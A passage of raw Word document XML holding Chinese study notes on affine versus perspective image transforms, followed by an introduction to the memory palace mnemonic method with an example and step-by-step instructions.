            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="12" name="图片 12" descr="http://img.blog.csdn.net/2014042817211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img.blog.csdn.net/2014042817211104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2275" cy="1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333D38" w:rsidRDefault="00333D38" w:rsidP="00333D38">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>图2.透视变换</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rPr>
        <w:t> </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rPr>
        <w:t>公式推导及应用详见</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="CA0C16"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/error/404.html?from=http%3a%2f%2fblog.csdn.net%2fu012380663%2farticle%2fdetails%2f43272851</w:t>
        </w:r>
      </w:hyperlink>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FF0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>三、二者的关系</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从这两天的学习和应用中初步的总结下两者的异同吧</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仿射变换：二维空间的变换 ； 线性变换 ；已知3对坐标点就可以求得变换矩阵</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t>透视变换：三维空间的变换 ； 非线性变换 ；已知4对坐标点可以求得变换矩阵</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rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333D38" w:rsidRDefault="00333D38" w:rsidP="00333D38">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>上篇中w及w'的问题需要使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:tooltip="齐次坐标" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="CA0C16"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>齐次坐标</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，即用三维向量（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, w）表示二维向量，仿射变换中w从来不变，这样可以把它当作为1，但透视变换中通常齐次元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>并不为1，所以为了映射回真实平面需要进行齐次除法，即每个元素都除以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD4D24" w:rsidRPr="00333D38" w:rsidRDefault="00AD4D24" w:rsidP="00AD4D24"/>
    <w:p w:rsidR="004B19A4" w:rsidRDefault="004B19A4" w:rsidP="004B19A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宫殿记忆法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00B27AA0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>何谓记忆之宫，须知西方人理性精神极盛，是故相信“按照事物的顺序进行记忆，通常而言极为简便”，以这种方法来存储记忆，就是利玛窦所谓“以本物之象，及本事之象，次第安顿于各处所”（《西国记法·明用篇》），细分起来，有寻常日用的知识，有切要但不常用的专名；有现实经验，亦有想像臆测以及真假参半的记忆。因此如何恰当实现次第安顿于各处所，其实即如同建筑房屋一般，而且其规模境界，也因人而异：考虑到利玛窦所具有的横跨中西、纵贯古今（指古典学问、中古神学与文艺复兴之后的西方世界）学识背景，就理应称其心灵世界为宏伟的记忆宫殿了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆宫殿法的使用可上溯至古罗马时期，一些令人难以置信的记忆绝活也可归因于它。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次世界记忆冠军</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dominic O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> Brien</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，他能记住</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张桌子上的所有牌（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2808</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张）的顺序，每张牌只看一次。通过运用记忆宫殿法及其变体，人们还取得了无数类似的成就。甚至在小说中都有几个例证，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thomas Harris</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的小说《汉尼拔》，连环杀手汉尼拔·莱克特就利用记忆宫殿长期储存了对复杂病历的极其鲜明的记忆。（遗憾的是，这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>段在电影里被删去了。传说，记忆宫殿是欧洲中世纪的秘术，因为印刷术没有普及，很多书都需要用人脑记，于是产生了记忆宫殿。但大多数人认为掌握记忆宫殿的人都是妖孽，便将他们烧死。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00B27AA0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆宫殿记忆法情节简介</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个人都可独力打造专属自己的记忆之宫。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你走进了一栋房子。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>房子相当宽敞，但又没有大到显得空洞。房子里的光线很充足，但又刚好不致於全无幽暗。所以你可以清楚地看到这栋房子的四角，各有一番光景。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>东南角，有两个人。一个高大壮硕的勇士手里举著一把长戈，作势要攻击。另一人则握著他的手腕制他。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>东北角，则是一个女人。很像画里的西夏回回女子的打扮。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>西北角，有一个农夫。正在拿著镰刀在割稻。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>西南角，则是一个女人抱著一个孩子在戏耍。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长「戈」的勇士有人制「止」他，那是「武」。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>东北角，「西」夏回回「女」子，那是「要」。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>西北角，农夫拿著镰刀在割稻（禾），那是「利」。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>西南角，「女」人抱著孩「子」在戏耍，那是「好」。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此这样一个空间里的影像，让他记住了「武要利好」四个字。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆宫殿法是最强大的记忆技巧。它不仅有效，还有趣——而且学起来完全不难。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆宫殿法的基础是这样一项事实：我们非常善于记住我们所知的场所。“记忆宫殿”是一个暗喻，象征任何我们熟悉的、能够轻易地想起来的地方。它可以是你的家，也可以是你每天上班的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>路线。这个熟悉的地方将成为你储存和调取任何信息的指南。来看看它是怎么运做的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A"/>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A"/>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆宫殿记忆方法简介</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．选择你的宫殿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先和首要的，你需要选择一个你非常熟悉的地方。本技巧的有效性取决于你在脑海中轻易地再现这个地方并在其中漫步的能力。你必须仅仅用你精神的“眼睛”就能身临其境。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例，一个较好的初步选择可以是你的家。请记住，你对这个地方的细节的再现越鲜明，你就能越有效地记忆。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其次，试着在你的宫殿里确定一条特别的路线，而不只是再现静止的场景。也就是说，想象对你家做一次详尽的巡视，而不只是简单地把你家图像化。就像我们将在下一步骤中看到的，这会大大增强本技巧的效果，如果你能按照确定的次序回想起物品的话。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对记忆宫殿的选择，这里还有一些行之有效的推荐，以及可以采取的路线：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你所在城市的熟悉的道路。可能的路线比如你开车上班经过的，或其他你熟悉的街道的顺序。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在或者以前的学校。你可以想象从教室到图书馆的道路（或者是去街对面的酒吧，如果那让你铭记于心的话）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作场所。想象从你的隔间到咖啡机，或者到你老板的办公室（这不难选吧）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风景。想象在附近一带散步或者你在公园里慢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>跑的路线。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．列出明显的特征物</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在你需要注意所选场所里的明显的特征物。举例，如果你选择巡视你的家，大门应该是第一个引起注意的特征物。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续在你的记忆宫殿里做虚拟漫步。进门之后，第一个房间里有什么？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统地分解这个房间（你可以确定一个标准程序，比如总是从左看到右）。什么是下一个引起你注意的特征物？可以是餐厅中间的桌子，或者是墙上的一张画。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一边走一边继续在头脑中记录其他的特征物。它们中的每一个都将成为一个“记忆槽”，等下你就可以用来储存一个特定的信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．把宫殿牢牢印在脑中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要让这个方法有效，最重要的就是要让这个地方或者路线百分之百地印在你的头脑中。尽你所能去记住它。如果你是擅长形象思维的人，这应该不难。如果不是，这里有一些能帮上忙的窍门：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照路线亲身走上一遍，当你看见那些明显的特征物时，大声地重复。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在纸上写下选择的特征物，在脑中巡视它们，并大声重复。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总是从同样的视角观看那些特征物。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得明白形象思维是一种技能。如果你仍然感到困难，你可能要先去提高你的形象思维能力。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你相信你已经成功了，再反复几次。对你的记忆宫殿来说，“大量练习”你的路线是非常重要的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>只要你自信已将路线深深印在你的头脑中，你就算准备好了。你已经拥有你的宫殿，它将可以反复用于记住任何你要记住的东西。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
